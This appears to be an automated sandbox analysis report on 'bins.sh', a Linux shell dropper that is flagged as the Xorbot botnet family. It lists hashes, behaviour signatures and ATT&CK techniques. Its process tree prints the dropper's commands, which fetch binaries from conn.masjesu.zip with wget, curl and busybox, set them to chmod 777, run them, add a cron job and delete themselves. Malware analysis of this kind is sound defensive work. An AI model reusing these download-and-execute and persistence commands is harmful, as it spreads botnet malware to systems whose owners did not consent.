Analysis
max time kernel
150s
max time network
153s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags
arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted
28/02/2025, 09:00
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240418-en
General
Target
bins.sh
Size
10KB
MD5
6fabcc812d0922db6c4f85ee41554bb8
SHA1
6990196753003a0019eb7fd54ce7669dc28e1ce2
SHA256
ffb51619f1efb0f87e5e75e7cd498cd8d80c049d07b821f83b3385cad45acb84
SHA512
c73c9f0896fd6274600bda9d0f047435578793c2ad71e2be682c615afff82b0dc09bfe59fbfe4904b9d15ab1247a6310ebd1f324f15479aac96fef76af9953d3
SSDEEP
192:CFj0rsk8cNUkQceCrt5H1l8dJ7t5lAk8IUkQceCzS:CB05NUkQceCj1edPUkQceC2
Malware Config
Signatures
resource | yara_rule
behavioral2/files/fstream-1.dat | family_xorbot
Xorbot family
Contacts a large (1765) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid | Process
712 | chmod
737 | chmod
Executes dropped EXE 2 IoCs
ioc | pid | Process
/tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn | 713 | bins.sh
/tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf | 739 | bins.sh
Renames itself 1 IoCs
pid | Process
740 | HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description | ioc | Process
File opened for modification | /var/spool/cron/crontabs/tmp.ly2K78 | crontab
Enumerates running processes
Discovers information about currently running processes on the system
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information, which indicates whether the system is a virtual machine.
description | ioc | Process
File opened for reading | /proc/cpuinfo | curl
File opened for reading | /proc/cpuinfo | curl
System Network Configuration Discovery 1 TTPs 8 IoCs
Adversaries may gather information about the network configuration of a system.
pid | Process
709 | busybox
717 | wget
728 | curl
735 | busybox
753 | wget
754 | curl
681 | wget
691 | curl
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
description | ioc | Process
File opened for modification | /tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn | wget
File opened for modification | /tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn | curl
File opened for modification | /tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn | busybox
File opened for modification | /tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf | wget
File opened for modification | /tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf | curl
File opened for modification | /tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf | busybox
Processes
(process tree; indentation shows parent/child depth, cmdline is the command line as executed)
/tmp/bins.sh
  cmdline: /tmp/bins.sh
  - Executes dropped EXE
  PID: 674
  /bin/rm
    cmdline: /bin/rm bins.sh
    PID: 679
  /usr/bin/wget
    cmdline: wget http://conn.masjesu.zip/bins/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn
    - System Network Configuration Discovery
    - Writes file to tmp directory
    PID: 681
  /usr/bin/curl
    cmdline: curl -O http://conn.masjesu.zip/bins/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn
    - Checks CPU configuration
    - System Network Configuration Discovery
    - Writes file to tmp directory
    PID: 691
  /bin/busybox
    cmdline: /bin/busybox wget http://conn.masjesu.zip/bins/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn
    - System Network Configuration Discovery
    - Writes file to tmp directory
    PID: 709
  /bin/chmod
    cmdline: chmod 777 6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn
    - File and Directory Permissions Modification
    PID: 712
  /tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn
    cmdline: ./6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn
    PID: 713
  /bin/rm
    cmdline: rm 6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn
    PID: 715
  /usr/bin/wget
    cmdline: wget http://conn.masjesu.zip/bins/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
    - System Network Configuration Discovery
    - Writes file to tmp directory
    PID: 717
  /usr/bin/curl
    cmdline: curl -O http://conn.masjesu.zip/bins/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
    - Checks CPU configuration
    - System Network Configuration Discovery
    - Writes file to tmp directory
    PID: 728
  /bin/busybox
    cmdline: /bin/busybox wget http://conn.masjesu.zip/bins/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
    - System Network Configuration Discovery
    - Writes file to tmp directory
    PID: 735
  /bin/chmod
    cmdline: chmod 777 HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
    - File and Directory Permissions Modification
    PID: 737
  /tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
    cmdline: ./HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
    - Renames itself
    - Reads runtime system information
    PID: 739
    /bin/sh
      cmdline: sh -c "crontab -l"
      PID: 741
      /usr/bin/crontab
        cmdline: crontab -l
        PID: 742
    /bin/sh
      cmdline: sh -c "crontab -"
      PID: 744
      /usr/bin/crontab
        cmdline: crontab -
        - Creates/modifies Cron job
        PID: 746
  /bin/rm
    cmdline: rm HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
    PID: 749
  /usr/bin/wget
    cmdline: wget http://conn.masjesu.zip/bins/hWHYBvRhtT1f8VRbCvqxcgu6yhHX0Fv0kt
    - System Network Configuration Discovery
    PID: 753
  /usr/bin/curl
    cmdline: curl -O http://conn.masjesu.zip/bins/hWHYBvRhtT1f8VRbCvqxcgu6yhHX0Fv0kt
    - System Network Configuration Discovery
    PID: 754
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification 1
Linux and Mac File and Directory Permissions Modification 1
Virtualization/Sandbox Evasion 1
System Checks 1
Downloads
Filesize
122KB
MD5
cd3d4b9c643e5b473fb4d88ed05f0716
SHA1
64ee7a97418583d759eaea8000890cc3bae1b5f4
SHA256
0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944
SHA512
164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52
Filesize
177KB
MD5
786d75a158fe731feca3880f436082c0
SHA1
79ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA256
5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA512
7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
Filesize
210B
MD5
06764c557c35627777378eb207e980bc
SHA1
77eae38157e9ee9c28dcae5b29b0b79ea3d45cdd
SHA256
6c4cbb07e05248100deeae3256c2b765ab16205da317b62fc8ff6a859da5c508
SHA512
95ff42eadd41143e2d4058049881725b8395c9f23f43ae503ad8b634af449aa5f29c9b590b28ab467a1b87c2c0d69accd0c153ee6c3800b52925b3c130985054